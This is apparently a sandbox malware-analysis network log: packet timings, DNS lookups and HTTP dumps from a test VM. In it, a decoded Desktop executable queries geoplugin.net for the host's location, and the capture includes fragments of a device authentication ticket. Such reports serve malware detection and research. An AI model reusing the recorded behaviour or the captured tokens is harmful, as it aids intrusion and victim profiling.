                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.264549017 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.264560938 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.264574051 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.264585972 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.264760971 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.266307116 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.296719074 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.326791048 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.381315947 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:30.977392912 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:30.986221075 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.034822941 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.034997940 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.057769060 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.057841063 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.058343887 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.058398962 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.077343941 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083614111 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083766937 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083821058 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083847046 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083863974 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.083961964 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.085519075 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.085875988 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.090970993 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.090981007 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.090990067 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.091176033 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.116569042 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.130008936 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.130822897 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.151679993 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.151983976 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.151988029 CET4435649323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.152071953 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.157545090 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.185399055 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.246207952 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.267277956 CET56493443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268064022 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268378973 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268518925 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.269561052 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:39.114226103 CET138138192.168.2.6192.168.2.255

                                                                                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.094419956 CET192.168.2.61.1.1.10x41a6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.745419979 CET192.168.2.61.1.1.10x1d08Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.745877981 CET192.168.2.61.1.1.10xd3b4Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.521956921 CET192.168.2.61.1.1.10x6b7eStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.522469997 CET192.168.2.61.1.1.10x6135Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.635132074 CET192.168.2.61.1.1.10xa893Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.635308027 CET192.168.2.61.1.1.10xfbe0Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.631700993 CET192.168.2.61.1.1.10x222fStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.631850958 CET192.168.2.61.1.1.10xd58cStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.416404009 CET192.168.2.61.1.1.10xd451Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.416938066 CET192.168.2.61.1.1.10x4cfdStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.417450905 CET192.168.2.61.1.1.10x1499Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.417597055 CET192.168.2.61.1.1.10x12eaStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.430783987 CET192.168.2.61.1.1.10x7d80Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.431101084 CET192.168.2.61.1.1.10x925aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.103199005 CET1.1.1.1192.168.2.60x41a6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.752696037 CET1.1.1.1192.168.2.60x1d08No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.752696037 CET1.1.1.1192.168.2.60x1d08No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753057003 CET1.1.1.1192.168.2.60xd3b4No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.528805971 CET1.1.1.1192.168.2.60x6b7eNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529534101 CET1.1.1.1192.168.2.60x6135No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529737949 CET1.1.1.1192.168.2.60x7eeNo error (0)svc.ha-teams.office.comsvc.ms-acdc-teams.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529737949 CET1.1.1.1192.168.2.60x7eeNo error (0)svc.ms-acdc-teams.office.com52.123.243.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529737949 CET1.1.1.1192.168.2.60x7eeNo error (0)svc.ms-acdc-teams.office.com52.123.243.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529737949 CET1.1.1.1192.168.2.60x7eeNo error (0)svc.ms-acdc-teams.office.com52.123.243.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.529737949 CET1.1.1.1192.168.2.60x7eeNo error (0)svc.ms-acdc-teams.office.com52.123.224.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.790090084 CET1.1.1.1192.168.2.60x5215No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.790136099 CET1.1.1.1192.168.2.60x567aNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:17.790136099 CET1.1.1.1192.168.2.60x567aNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.642678022 CET1.1.1.1192.168.2.60xfbe0No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.643285036 CET1.1.1.1192.168.2.60xa893No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.638356924 CET1.1.1.1192.168.2.60x222fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.638356924 CET1.1.1.1192.168.2.60x222fNo error (0)googlehosted.l.googleusercontent.com142.250.185.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.639090061 CET1.1.1.1192.168.2.60xd58cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.423577070 CET1.1.1.1192.168.2.60xd451No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.423577070 CET1.1.1.1192.168.2.60xd451No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428286076 CET1.1.1.1192.168.2.60x12eaNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428302050 CET1.1.1.1192.168.2.60x4cfdNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428312063 CET1.1.1.1192.168.2.60x1499No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428312063 CET1.1.1.1192.168.2.60x1499No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438819885 CET1.1.1.1192.168.2.60x7d80No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438819885 CET1.1.1.1192.168.2.60x7d80No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438851118 CET1.1.1.1192.168.2.60x925aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                                                                                                                              • assets.msn.com
                                                                                                                                                                                                                                                                                                                            • geoplugin.net

                                                                                                                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            0192.168.2.649712178.237.33.50801220C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.113303900 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: geoplugin.net
                                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.736361980 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            date: Sun, 05 Jan 2025 07:39:03 GMT
                                                                                                                                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                                                                                                                                            content-length: 963
                                                                                                                                                                                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            0192.168.2.64971340.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 58 67 6e 65 44 57 2f 30 45 79 67 33 77 52 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 37 63 62 65 36 36 34 39 39 64 31 36 30 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: dXgneDW/0Eyg3wRm.1Context: 567cbe66499d160f
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 58 67 6e 65 44 57 2f 30 45 79 67 33 77 52 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 37 63 62 65 36 36 34 39 39 64 31 36 30 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: dXgneDW/0Eyg3wRm.2Context: 567cbe66499d160f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 58 67 6e 65 44 57 2f 30 45 79 67 33 77 52 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 36 37 63 62 65 36 36 34 39 39 64 31 36 30 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: dXgneDW/0Eyg3wRm.3Context: 567cbe66499d160f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:05 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 46 61 52 58 62 72 4f 70 45 57 75 63 79 32 4e 32 53 78 4d 68 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: WFaRXbrOpEWucy2N2SxMhg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            1192.168.2.649728142.250.185.1294433060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC565OUTGET /crx/blobs/AW50ZFsblKnSZ4Cokd_6ezff90SqESnzsDEP0_aWj8PLQyaNmulL_TFAO6OaDn6E5KUtzAPUWysfE9UxhZGBEHCFOUAFecownXTgsAqMLybJ_4b5zhdpH_xwtOXPc5Q3MqgAxlKa5U4FuWWuIm1PKcKfveKWVE_LlpSM/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_12_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                            Content-Length: 1993285
                                                                                                                                                                                                                                                                                                                            X-GUploader-UploadID: AFiumC5uV43Ac62GeM-9Po4zo9ih6zLUikkgL4uCjNkl8uKkMCiUC0J695d6fAofNMR_eS2M
                                                                                                                                                                                                                                                                                                                            X-Goog-Hash: crc32c=vQB/UA==
                                                                                                                                                                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 06:34:09 GMT
                                                                                                                                                                                                                                                                                                                            Expires: Mon, 05 Jan 2026 06:34:09 GMT
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                            Age: 3902
                                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 05 Dec 2024 12:57:45 GMT
                                                                                                                                                                                                                                                                                                                            ETag: cf3166d4_ed450d15_095c4c28_d113f6ea_1c2fe6de
                                                                                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC827INData Raw: 43 72 32 34 03 00 00 00 1a 04 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d
                                                                                                                                                                                                                                                                                                                            Data Ascii: Cr240"0*H0\7c<Fto82'5qk%2CF9#exQ[L|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k|1n<Fbf*Q1s2{*6PpobM
